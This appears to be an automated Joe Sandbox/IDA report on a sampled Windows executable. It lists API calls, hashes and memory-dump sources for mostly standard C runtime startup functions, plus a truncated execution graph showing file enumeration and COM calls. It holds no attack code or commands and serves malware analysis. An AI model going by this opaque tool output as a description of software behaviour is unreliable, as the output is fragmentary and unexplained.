                          • Instruction Fuzzy Hash: FD4163F1D00205AEDF10AFB59D86A6F7BA4EB94305B14083FE505F22E0DB7D9944CA5E
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction ID: 38895570f31eb67b982826470c9dd1e6c230b0faa58df9c9f10e023fb9096192
                          • Opcode Fuzzy Hash: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction Fuzzy Hash: 4DF0E936E48301D7E720A7A09D49B2D3134AB44765F34053BE001BB2E1CDBC4942661F
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 004020B3
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004020C8
                          • UnhandledExceptionFilter.KERNEL32(00408204), ref: 004020D3
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 004020EF
                          • TerminateProcess.KERNEL32(00000000), ref: 004020F6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction ID: b20ca496c67c0111f9bdb02fdd2caa8760b953d18a2e8655b2b95bf976f6fc72
                          • Opcode Fuzzy Hash: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction Fuzzy Hash: 5321AEB5950304DFC710EF24EF48A453BB5BF88306F10403AE549B36A1E7B859A59F9E
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(Function_000020FE), ref: 00402140
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 935903d1246056ec072c2b6f805f6196f3f8f058df6acf2eaccc246f31e18100
                          • Instruction ID: dcff0890bebcf140c8cc589396629a1fb90812a7206754ae37c15cb8782ea16a
                          • Opcode Fuzzy Hash: 935903d1246056ec072c2b6f805f6196f3f8f058df6acf2eaccc246f31e18100
                          • Instruction Fuzzy Hash: A29002A02923005AC64017709F0D50535906A4861275284756145F44E4DEF44098F519
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bcf88edd903997ba0d45f657b351e7f0d641ff21066f36589517d37c3ba8912e
                          • Instruction ID: 0e311bcd35e9ec61c2f1014f34d0078782a6940f0d525e91e9a8e8fef8a8f8c0
                          • Opcode Fuzzy Hash: bcf88edd903997ba0d45f657b351e7f0d641ff21066f36589517d37c3ba8912e
                          • Instruction Fuzzy Hash: A262AB316083658FD324DF28C48025ABBF1FF95344F554A2EE9A5CB360E735E949CB46

                          Control-flow Graph

                          APIs
                          • _strcpy_s.LIBCMT ref: 004024D1
                          • __invoke_watson.LIBCMT ref: 004024E2
                          • GetModuleFileNameA.KERNEL32(00000000,0040B091,00000104), ref: 004024FE
                          • _strcpy_s.LIBCMT ref: 00402513
                          • __invoke_watson.LIBCMT ref: 00402526
                          • _strlen.LIBCMT ref: 0040252F
                          • _strlen.LIBCMT ref: 0040253C
                          • __invoke_watson.LIBCMT ref: 00402569
                          • _strcat_s.LIBCMT ref: 0040257C
                          • __invoke_watson.LIBCMT ref: 0040258D
                          • _strcat_s.LIBCMT ref: 0040259E
                          • __invoke_watson.LIBCMT ref: 004025AF
                          • GetStdHandle.KERNEL32(000000F4,?,?,00000000,77735E70,00000003,00402631,000000FC,0040667C,00000001,00000000,00000000,?,00403FFF,?,00000001), ref: 004025CE
                          • _strlen.LIBCMT ref: 004025EF
                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00403FFF,?,00000001,?,00403478,00000018,004093D0,0000000C,00403507,?), ref: 004025F9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                          • API String ID: 1879448924-4022980321
                          • Opcode ID: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction ID: 3ad8829dabe9c8e6b7970468b651ade891dcb41a26c93daa50347fadcc2e15d8
                          • Opcode Fuzzy Hash: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction Fuzzy Hash: CF3127B2A402153AE62136326F5EF2F314C9B91315F14013BFE09B26D6FABD9A1441FE

                          Control-flow Graph

                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,004017BE), ref: 00401E7C
                          • __mtterm.LIBCMT ref: 00401E88
                            • Part of subcall function 00401BCA: TlsFree.KERNEL32(00000002,00401FF5), ref: 00401BF5
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000000), ref: 004033DC
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000002), ref: 00403406
                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00401E9E
                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00401EAB
                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00401EB8
                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00401EC5
                          • TlsAlloc.KERNEL32 ref: 00401F15
                          • TlsSetValue.KERNEL32(00000000), ref: 00401F30
                          • __init_pointers.LIBCMT ref: 00401F3A
                          • __calloc_crt.LIBCMT ref: 00401FAF
                          • GetCurrentThreadId.KERNEL32 ref: 00401FDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                          • API String ID: 2125014093-3819984048
                          • Opcode ID: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction ID: 2b6f412a48510a2ea5e28321b190ff4220801d9e6bfc04da0c4d4af9d52f3434
                          • Opcode Fuzzy Hash: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction Fuzzy Hash: AF318F319483029BE7146F75AF05B063AA5AF40355712053FF861B22F5EF7C8490EB5E

                          Control-flow Graph

                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                          • GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                          • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                          • InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                          • __lock.LIBCMT ref: 00401C86
                          • ___addlocaleref.LIBCMT ref: 00401CA5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                          • API String ID: 1036688887-2843748187
                          • Opcode ID: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction ID: 560e36331183b230e08dea58ace58335192f7a528c6e8c7e040251058e5fa637
                          • Opcode Fuzzy Hash: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction Fuzzy Hash: 32113D719847019EE7209F76CA45B5ABBE4AF04348F10853FE899B62E1CB7C99418F19

                          Control-flow Graph

                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 00402C70
                          • __calloc_crt.LIBCMT ref: 00402C83
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                          • __calloc_crt.LIBCMT ref: 00402D06
                          • GetFileType.KERNEL32(00000038), ref: 00402D86
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402DBA
                          • GetStdHandle.KERNEL32(-000000F6), ref: 00402E10
                          • GetFileType.KERNEL32(00000000), ref: 00402E22
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402E50
                          • SetHandleCount.KERNEL32 ref: 00402E7A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Count$CritFileHandleInitSpinType___crt__calloc_crt$InfoSleepStartup__calloc_impl
                          • String ID:
                          • API String ID: 1318386821-0
                          • Opcode ID: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction ID: b2392c38ea11d8206f0d28861f948c6360aed0bed67f1e2b59f3cb23873ff797
                          • Opcode Fuzzy Hash: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction Fuzzy Hash: 366136715447518ED7248B38CB4C7167BA0EF02324F29437BD9A5BB2E1D7B89806CB9D

                          Control-flow Graph

                          APIs
                          • getSystemCP.LIBCMT ref: 00403BEC
                            • Part of subcall function 00403B59: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00403B66
                            • Part of subcall function 00403B59: GetOEMCP.KERNEL32(00000000,?,00402A85,?,?,00000001), ref: 00403B80
                          • setSBCS.LIBCMT ref: 00403BFE
                            • Part of subcall function 00403854: _memset.LIBCMT ref: 00403867
                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,00409430), ref: 00403C44
                          • GetCPInfo.KERNEL32(00000000,00403F56), ref: 00403C57
                          • _memset.LIBCMT ref: 00403C6F
                          • setSBUpLow.LIBCMT ref: 00403D42
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                          • String ID:
                          • API String ID: 2658552758-0
                          • Opcode ID: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction ID: 0e9026f4e105130f7015617c44e62dc713e6d3fa9c6682f74f6de7838a23a284
                          • Opcode Fuzzy Hash: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction Fuzzy Hash: 875108319042558BDB159F25C8442BABFB8EF05306F14847FE881FF282C63CCA46DB99

                          Control-flow Graph

                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                          • TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: EncodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-3682587211
                          • Opcode ID: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction ID: 2de7d8fd10128b17cfc71597f2b569db04ade18300f5c4710948ea3b5a4a2571
                          • Opcode Fuzzy Hash: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction Fuzzy Hash: 68F06D307017169BD7219F25DE04A5A3AB8AF80790B16417AB844F62F4EF38DC029A6D

                          Control-flow Graph

                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                          • TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: DecodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-629428536
                          • Opcode ID: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction ID: 1a7e216e592b3cd04d2002f0154b272c3d781bc2d345389bf2442321812c8d59
                          • Opcode Fuzzy Hash: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction Fuzzy Hash: 96F062305013129BC7215F24DE44E6A3AB89F407947154136F854F22F0EF34DC018A6D

                          Control-flow Graph

                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction ID: 7291aa48b631972549e6df949c7a5fbc9f7bec4cf14f78cf3737268845182a7c
                          • Opcode Fuzzy Hash: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction Fuzzy Hash: C3F02E36D01705A7E720A7B4CE49B6D3134AB88765F35013BF5017B2E2CABC4D06A62D
                          APIs
                          • __lock.LIBCMT ref: 00403F82
                            • Part of subcall function 004034EE: __mtinitlocknum.LIBCMT ref: 00403502
                            • Part of subcall function 004034EE: __amsg_exit.LIBCMT ref: 0040350E
                            • Part of subcall function 004034EE: RtlEnterCriticalSection.NTDLL(?), ref: 00403516
                          • ___sbh_find_block.LIBCMT ref: 00403F8D
                          • ___sbh_free_block.LIBCMT ref: 00403F9C
                          • HeapFree.KERNEL32(00000000,?,00409450,0000000C,004034CF,00000000,004093D0,0000000C,00403507,?,?,?,00406798,00000004,00409530,0000000C), ref: 00403FCC
                          • GetLastError.KERNEL32(?,00406798,00000004,00409530,0000000C,00404045,?,?,00000000,00000000,00000000,00401CEF,00000001,00000214), ref: 00403FDD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 2714421763-0
                          • Opcode ID: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction ID: 478c35e85f2b107ed22a8aba67e00a0e018390ca299f0d6e226d856ee505d4b6
                          • Opcode Fuzzy Hash: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction Fuzzy Hash: AB012C71D05602AADB207FB29A0AB5E7A78DF0076AF20413FF404B61D1CB7C8A449A9D
                          APIs
                            • Part of subcall function 00401D3D: __amsg_exit.LIBCMT ref: 00401D4B
                          • __amsg_exit.LIBCMT ref: 00403A5F
                          • __lock.LIBCMT ref: 00403A6F
                          • InterlockedDecrement.KERNEL32(?), ref: 00403A8C
                          • InterlockedIncrement.KERNEL32(020A1588), ref: 00403AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                          • String ID:
                          • API String ID: 4129207761-0
                          • Opcode ID: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction ID: 3b707b5fd0894213fb8e8695ce472a26b52a1803b1b57e4fe7db1faaf9775e12
                          • Opcode Fuzzy Hash: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction Fuzzy Hash: 3A018E32E00B119BD611AF6A990974A7B64BB05716F05403BE890773D1C73CAB51DFDE
                          APIs
                          • GetLastError.KERNEL32(?,00000000,00404281,00402202,00000000,00402EFA,FFFFFFFE,?,?,?,?,00402F66), ref: 00401CC8
                            • Part of subcall function 00401B98: TlsGetValue.KERNEL32(00000000,00401CDB,?,?,?,00402F66), ref: 00401B9F
                            • Part of subcall function 00401B98: TlsSetValue.KERNEL32(00000000,?,?,00402F66), ref: 00401BC0
                          • __calloc_crt.LIBCMT ref: 00401CEA
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401C07: GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                            • Part of subcall function 00401C07: InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                            • Part of subcall function 00401C07: __lock.LIBCMT ref: 00401C86
                            • Part of subcall function 00401C07: ___addlocaleref.LIBCMT ref: 00401CA5
                          • GetCurrentThreadId.KERNEL32 ref: 00401D1A
                          • SetLastError.KERNEL32(00000000,?,?,?,00402F66), ref: 00401D32
                          Memory Dump Source
                          • Source File: 00000000.00000002.1641140611.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1641121132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641140611.000000000040D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1641183888.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl__lock
                          • String ID:
                          • API String ID: 1081334783-0
                          • Opcode ID: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction ID: d2849ffa799b97934cc6d9bfafbcb639600e9549b280b5eba9c9c239b681eae2
                          • Opcode Fuzzy Hash: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction Fuzzy Hash: 2EF0FF325447229AD6363BB96D0AA8F3AA49F41761711093FF580B61F0CF3CD80296AD

                          Execution Graph

                          Execution Coverage: 2.3%
                          Dynamic/Decrypted Code Coverage: 0%
                          Signature Coverage: 4.8%
                          Total number of Nodes: 1144
                          Total number of Limit Nodes: 6
                          execution_graph 6125 404ec0 6149 40821c 6125->6149 6127 404edf 6128 404f04 6127->6128 6129 404ef4 6127->6129 6132 404efd 6127->6132 6156 40c519 6128->6156 6152 404e7b 6129->6152 6133 405111 6134 40c5b9 SysFreeString 6133->6134 6134->6132 6137 40c5b9 SysFreeString 6138 405103 6137->6138 6139 40c5b9 SysFreeString 6138->6139 6140 405109 6139->6140 6141 40c5b9 SysFreeString 6140->6141 6141->6133 6142 404f0b 6142->6132 6142->6133 6148 4050f2 6142->6148 6163 40c43d 6142->6163 6147 4050e2 6172 40be3a 6147->6172 6175 40c5b9 6148->6175 6150 408233 PathCombineW 6149->6150 6151 408220 6149->6151 6150->6127 6151->6150 6153 404e93 6152->6153 6178 408248 6153->6178 6192 40c4b4 CoCreateInstance 6156->6192 6159 40c531 VariantInit SysAllocString 6160 40c589 6159->6160 6162 40c551 VariantClear 6159->6162 6160->6142 6162->6160 6194 40bf60 6163->6194 6166 4050ce 6166->6147 6168 40c00b 6166->6168 6167 40be3a HeapFree 6167->6166 6169 40c01a 6168->6169 6171 40c03b 6168->6171 6170 40bde1 3 API calls 6169->6170 6170->6171 6171->6147 6173 40be41 HeapFree 6172->6173 6174 40be53 6172->6174 6173->6174 6174->6148 6176 40c5c0 SysFreeString 6175->6176 6177 4050fb 6175->6177 6176->6177 6177->6137 6179 40821c PathCombineW 6178->6179 6180 408268 6179->6180 6181 408272 FindFirstFileW 6180->6181 6182 404eb9 6180->6182 6181->6182 6189 408292 6181->6189 6182->6132 6183 4082a2 WaitForSingleObject 6184 4083b6 FindClose 6183->6184 6183->6189 6184->6182 6185 40839e FindNextFileW 6185->6184 6185->6189 6186 408306 PathMatchSpecW 6186->6189 6187 40821c PathCombineW 6187->6189 6188 408374 Sleep 6188->6189 6189->6183 6189->6184 6189->6185 6189->6186 6189->6187 6189->6188 6190 40833f Sleep 6189->6190 6191 408248 PathCombineW 6189->6191 6190->6189 6191->6189 6193 40c4dd 6192->6193 6193->6159 6193->6160 6195 40bf72 6194->6195 6196 40bfbf 6195->6196 6198 40bfa7 wvnsprintfW 6195->6198 6199 40bde1 6195->6199 6196->6166 6196->6167 6198->6195 6200 40bdf2 6199->6200 6201 40bde5 6199->6201 6203 
